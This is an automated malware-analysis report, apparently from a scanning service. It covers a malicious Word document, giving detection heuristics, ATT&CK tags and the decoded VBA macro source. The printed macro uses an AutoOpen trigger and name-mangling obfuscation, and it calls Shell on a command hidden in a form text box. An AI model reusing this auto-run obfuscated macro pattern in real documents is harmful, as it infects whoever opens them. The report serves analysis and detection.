Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and triggers the execution of a function that uses the Shell() function, indicating an attempt to run external commands. This is further supported by heuristics indicating suspicious cmd.exe and PowerShell invocations. The primary function of the script appears to be executing arbitrary code, likely for downloading and running a second-stage payload.
Heuristics (10)

- ClamAV: Doc.Malware.Sload-6784187-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Sload-6784187-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]. Matched line in script: `_ .Shell(mXSIvmQt, swnrzoF), jPRrSKz) Set vtTRSDbGTCcSNBMPID = PfMTfQsVAYwbqlqXlSv`
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]. Matched line in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() hdCaNY`
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]
- Reference to PowerShell [high, SC_STR_POWERSHELL]
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9560 bytes |

SHA-256: 396f16fce4e4815e67b029145ed9f54c0b44bda4d614c247e14c9c81476094ed

Detection (ClamAV): No threats found

Obfuscation or payload: likely. 264 of 305 identifiers look randomly generated (e.g. 'cmpwwwBYFWFSuGfWhzwsGcKa'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ffvbdMdNr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
hdCaNY
End Sub
Attribute VB_Name = "wiQQzlOiKpLEl"
Function hdCaNY()
On Error Resume Next
Set qopQKDdRzczFUucQQUb = hlMqffFQzzzlZbBbrdcVtF
Select Case mmhPlGYzrwvtFbwkizNRAiNf
Case 298978386
BZnsGwbpaDzQUKbBFoihwzs = zYfovHZCWrEzKzqwRPBvmOd
qzYYALwCjuuiQn = 301370277
ivucFcqGwfQjzzFivc = wiBBKuCSPEIhdViQrTAzOISa
Case 137731007
QEioMnoqzkdujhDJaBpwmLP = CByte(OOuiioPbjPizkasVsnYz)
wjStFhRkWIFpBazsJIIUCO = ChrW(CFZAITFzmRtSibkcGw)
JGZIiAvdjfQdlhPQnjhIQR = Log(SYIHSQYfBWLENdz)
End Select
Set PWNQGjiLTIhiHNYG = rtAzIKzaVaGiRmZ
Select Case QmQcZbMvjVoCRPpjVbknlP
Case 47181548
OqlJXdBVIuqbIiiQ = EOmVzIFlaNqBlBBfEOipD
FTStXYNYqtUGjAUqQi = 211984340
zQKUXspwDQzaihITDEl = XCWzhfVAKOzAJfZpIwWi
Case 233520196
UattbzrBnMzzAvtNn = CByte(XolpSzRzHTKFhGwGhwDoDVI)
alDJfivvLiGufiHu = ChrW(crYqhiqCtNzJwoBfbOh)
HTdYOuDzCaCoJMaikSsGMGlQ = Log(mMqFPEPawTINAcnbqATKIzmN)
End Select
Set vEcNwXnfzWETWaSXtJ = nEqlCPjmlQiwFMnKcCIoS
Select Case ZCkJiqmkXQDWaSFSawO
Case 243499629
OSazHiPqVkVRMf = BsjtAAtOsilVFJcKZhZKjJ
bHWuCjiENnRRhSVk = 6862674
EiQVNJjsavjnUDrhEm = GqhJdXiorurEzXpfbuGu
Case 85878774
JFnVaSNaANjHuiWY = CByte(ziVowirmPfYPnwrQshcVIz)
aRuiVqdKIDGIPrYKX = ChrW(iKnpKMOrqBzuCizOvXEDVwlU)
MjqcYTWFZZmckHhQi = Log(bNOAcIBwBGTamYSazfYPSiap)
End Select
Set LlYfcDtjQcrNdzXbkGjwl = VdOPsSMnkRoDLSurfIAjDo
Select Case HpkfWccGbwZPuRMLaXcs
Case 166336082
anEjsaXzChjzGZInpKH = NGlCzaSzaLbwGiPw
pkBidurizKmCniRkNLT = 14096711
hRIZXqGkrXKLMz = FcjLtTCQjumdJMsXvuZ
Case 57032218
tIGElwFmcrbjrilcII = CByte(iBbfkMwYwAPQmqHMTdHIV)
dEDLuShHunmrdRRdVsoZHmMa = ChrW(skSRwBzMiYXbZSiqrFbivM)
uqHOTvprrcXChPpwmmivtt = Log(waKjPjlwsfuYbr)
End Select
Set KSQuOuQHjpIkMSb = NwZrQJpzRZsUhvzfjcJcdFA
Select Case JtqLzdkuVfhsUEoAdRd
Case 269504232
wZorcDjJzPHvBh = TiBnozwCOFLcnIwMbL
NTCTVZAlWQZwSWRhwQ = 278079288
EzXalQbvAADjkf = EQKjNoMblpJtGWaAwl
Case 76570695
PvciEwFkWNtLnBNRn = CByte(cMsVmlbXUZaAGuYOFIncb)
ibFYvzFFJJMMJzZtJ = ChrW(GhdjKWGwnYwEdLINdQQNpiR)
PQnulYpLzwWtlCRjR = Log(KhJEjBDwWIdvCcPOQtiLMOjk)
End Select
Const swnrzoF = 0
Set HdDckjMnCatcjz = joajOiMGGXfGzuk
Select Case ipVQLCrqsOSrZCwVPmMkanaT
Case 306590448
wFEZPtRcLnNjuhzkqz = VhDaKqKhAYvPCVoFm
TwYZwrJIjsinqwaDZptiu = 228558908
LQEQYKNFcKwXArv = LRBKSCNhwowwwMHqkuMIr
Case 181952003
zSmCcrYZMiEhNsYmJDWRj = CByte(RHQCInGimtkjErjA)
qaPmStiuzLIDFUKBlBfmZ = ChrW(lSisLzhohFIRjqTazNlIK)
wajYZiTpBNLHpwDZihN = Log(iCvnoTiKCRBRYJUI)
End Select
Set BBmulEpbjpHXnh = lZDUHXmEjlwPjPEm
Select Case kuXwMSDPFiPJDlra
Case 298180131
XPCDfOwDImpILbCumt = NZGAFBoWujAGonrh
KjOIBJJQazWoGJwwQf = 329574273
PzCrsBXIfAVTufjGi = MPwjiERioWCIYH
Case 302419667
HMiXQzmBlZbCtaZrU = CByte(SiTfSzZJNAFXcNZdY)
cHkNdvwEcPpNzKnIpL = ChrW(btjzHllvOzOcPCCPMfFEYhNV)
UADvjTYOfwcvJcbs = Log(jHOmZLuubdjHZufLnnliAidq)
End Select
Set StPTjwNQKYPBTzAC = MilMYAzwzCMvvcV
Select Case BYEzFSDwwEAjuHLCWnJEBz
Case 301761482
SWluAVOvuLSawDBufmPTzRC = rKYISRoCfLhjhJzbpFmipl
TlPZOjZtBUvCpwG = 189990990
XQvlVSNVoniufTBGFFWD = ZSFRjOlGIficJKZpTzTCDZv
Case 313268012
WAtwkrkZjwzqTpDbPjIvRVIc = CByte(lHCApzWJTJOsKXnwC)
MbzAHPbosnAjArRfwjh = ChrW(uwbjAfpjFIUzPvwAQlz)
ZAHjJmJWaiZEQiiOATzcZr = Log(kSDRFvQPMktwursXOWTIb)
End Select
Set UbQuSszMXwJFfKsABRH = JWNjnPMtwlHqOIDjfqmOjvdG
Select Case aJDYRZvYRSwOhGDf
Case 39388612
lpSrWHLVKftPOsHVM = IUfMMSwqFSwkjid
sQvjmwMvOPfCDFGLtzXl = 232277086
dAujCtWavKlhAqadTLI = zwmumzLmqlLszTnvpGuSY
Case 263747776
VQVFQkQdLczbhNztCi = CByte(kKwskhCfoNQpLJbRiQuuC)
IAPwsGhpMskoEJWXlYN = ChrW(bPunnRFwVcHnhJB)
cmpwwwBYFWFSuGfWhzwsGcKa = Log(lTkkwGuIXuwjRH)
End Select
Set HXzFiRbjHOFozM = lRSzspCoZSVDivBYWHdJKOs
Select Case KfMfSwSfMabvEVQMFj
Case 160259364
NOwlFpjjVCjWYvpNdWVczq = EUFUArQEbqFJviaacNlJJtE
JjDjjNvnXXsRAVipEzF = 212177086
luiCwtPNjhKPhLUoh = NvSmXqIZGfwEMoYFXm
Case 162151261
nUfZrqhBSKNBXcrlAwWn = CByte(WmkRbVWrcniPAitPsvhJGHv)
uhjwnFYPknQhvIPVL = ChrW(qXflXuzVHDpimPqS)
tlZEXOSiNRMTkfLwwQ = Log(lIKozRzUZGABrckWjlF)
End Select
Set wfLTokUIwOYLSES = stEdicRWbwRMSDGmLEZzHjc
Select Case qvZUmdDpIPrwjhaVNo
Case 292976025
SIqsHmzOfUnIRhnmDwjzscD = LHGidEkSqkDiFj
AdpJocjjwuoRQFuz = 279656126
nhAjVkbkURhiEj = kiUDSPacaHjpmTNwkM
Case 198856651
zMUHEiDIRzTqHujWa = CByte(XpNEZYmvoRHVzRaOYXOMwjLR)
bothrmqWnopFumvV = ChrW(umBwCCPsWIINwod)
szksNwiQwJclJdlTrppYQPZm = Log(pViiJpALJBpLcvzIkzsZ)
End Select
mXSIvmQt = ffvbdMdNr.TextBox1 + GkLIsAb + iQLnBP + MfRnIPLJ + utOOjEn + WjzfuWUW + whZAAdiE + jnPqV + qupdIFiA + KSsvYh + bioRtbK + tNlFAX
Set MmoSTMRWCdcZREzh = tvLFrpriQMjjvTPjwXCzdDOp
Select Case OoEODWWQGkGDDVwzn
Case 18906561
hpHJNsVhzjSqhV = cAmPNpNPoiJdsCFApANIcH
rWipYjouZhPswLYpKTZS = 176684477
PdirjcpTNLVVut = ApiAojvcJJoRLDpCoEnG
Case 31540889
hzLEGUEXbQiKJirR = CByte(UUBUiuLiPYJjRGmapHlpjd)
YliYmAtKKXRTmDpzCzZ = ChrW(wurJKrjUWFcDqsdjzWZiWN)
JznAWAHipJniduYNuQZnFuOd = Log(aGzfavUjviKWrNTPWntCOzo)
End Select
Set HTZjjSQdNRaJrALIQjb = bjjSivlhspdTnfROho
Select Case MKoLFVZjJpKIiIuwXnGBnjj
Case 244602819
oHWMjwbcsOLnYbwFPcr = hzKsjtaamDjbDnQODUasj
mtjLzMKwYErDqowdfpWB = 279952934
ijklKiCvCwzCNRIVuOQqfb = zwcRZolWiozKzaOCbtcCt
Case 38843192
bfVKuHkAJHAkoiRdGQbPNQ = CByte(IujLowCZqtIAmDd)
OzonDzqZUKQWlRqbLYMQOww = ChrW(HhKrjhfZdaNRZc)
IEGrifjoZDjpNq = Log(cSAjjVpwtnfrsKDY)
End Select
Set wiXpJzZnFiowzfHStZIhr = NWHmMfItIkpDqLfGRKl
Select Case azSrQjjwzmMwpVRAiX
Case 243863943
fLZEItowmnIwwYBPDPVdwJw = XtNVtiXtZqoPXOiXuk
JiOARTBwSCHvVODh = 99851222
SCIPOZFjmrpjziOwnrIt = BsiFrRvTAUhTrchDtQpuhhJG
Case 248199905
ZjXbLYVjQJZKWH = CByte(QlXIMGFjutbTwOUi)
TnsOwYJIzIMXijthkRw = ChrW(wYzTzcikFXUwazqiOvUNOz)
ztJQJhlNzXwcupZOT = Log(YDanPwjsKTpwiYzJAZqLYC)
End Select
Set dMJHMmnkGuBTmoPP = UkZvOchifqEOvSHl
Select Case JQMWSUECtaMOYQMpAZMn
Case 92850246
kbZhwiVLbtiIizDn = QVsVCUTHasZvsv
PvjkzlXVjizTjQmNlNYvSVth = 48554658
aVqvQizksiSTpPs = LmDBnqoiohUziuCwcsLCilRQ
Case 143228500
XDvSYJDSJGiGRjhMHiOzFzfT = CByte(wDpVaUmfrTkiVJLwMlwUWa)
VSdjCYqZXbcbFNzilraa = ChrW(wdlYDBtMjzTVaUDwl)
HBtMHtiFiOCKcwANYorKw = Log(wMocIFitumzHTZVjWs)
End Select
Set oKrIOWiKtNCtuWGwFH = hmiIawsKrojmwvGDiarGi
Select Case HICCrquqjbRlBhJCQJV
Case 84286954
WKaDwnScVOAFHfVGYHBPBF = UNtZtbJhkRmlwbw
CbNNNQftBovsBUzlRDFqFOZ = 5768189
jQoUuXiZOznnrtEh = XFjRfQUBUuVIno
Case 13400672
BjzrYHQQSnUKwZKB = CByte(EqUUvAAUTadJRbK)
aqMEqbPoPwsvJDukTziwh = ChrW(GjzWFhnHBLJYXjzzSdafFwH)
KQfspSsMEijjFTV = Log(BHwhllfLmWjEXBmJYtMpC)
End Select
WYiVv = Array(ojAXpvoJi, kRWSXB, YdlpAYHR, Interaction _
_
_
_
_
_
_
_
.Shell(mXSIvmQt, swnrzoF), jPRrSKz)
Set vtTRSDbGTCcSNBMPID = PfMTfQsVAYwbqlqXlSv
Select Case fjiXbVwalwbUJjuojanBa
Case 226120851
iWblhXdbzNVwjAosKUR = DwcSJqBoKiuHzEwAAjPDH
iHnkLnuichJwYluJcq = 145047558
QSSNwiEorbEOcjSUiYfNtc = NwzjKFqHYhSDLp
Case 169673885
jjGqBcuWpTaiDLIvoQFPzw = CByte(iBUfhKfHfEnwinmBkDdrrfM)
NYWPvjKmioXphw = ChrW(LJLvaQMdICPULWGC)
oQSIoPLvuAQqQw = Log(oqRhfjmnAvNNjOzPbl)
End Select
Set CFQsvzIkBnaNXQ = RTuEjONvbdvzfhH
Select Case qzNDYXjUBwJiWQUFfCuzs
Case 68514421
moJpPAAdCuGkPKM = tmZCmFiZKIqScnHofrbOO
RTBTGjPjFvSUANSHThFkf = 44236489
hAPnREYizTLUGBSw = JiDvzInuWYXuIdCLJTTrwwbh
Case 84231788
BosMGBiGaADOhscsvj = CByte(oppIJwhzGCLDWi)
GwBKRWLCDCHvlbPDDujY = ChrW(MfjQYCbDPzhjCldrkPdc)
mGBBvXrzHJpJAuSSttUjwn = Log(aOjpmMSfCwraZhP)
End Select
Set QwfRSKEJuXQmMFTuvSkt = fjdzOUtKFsWjBAtTcNGdhnaK
Select Case OEZJHJnMhkNBSE
Case 279495872
zofuGKFaaSEiPNsI = zzPTBziiUUPjSKJPSi
vPuEwzioEJwTsEiUEarzqwLm = 275883755
tHIvOwitNDDvRUSIiZXAWc = pEpblHwEHOJGbjJuzpzqf
Case 110034491
JXfhSmPoTRXTqYV = CByte(lOzwhINrcUfXLXlFYvjDGZf)
sZpoDNTVivNcjUcBJ = ChrW(FzGsdvjSuusRnMjjDHSZoP)
JsQKJZETiuSUhL = Log(wtIkTYdMHAszQUjkzpwzzMlX)
End Select
End Function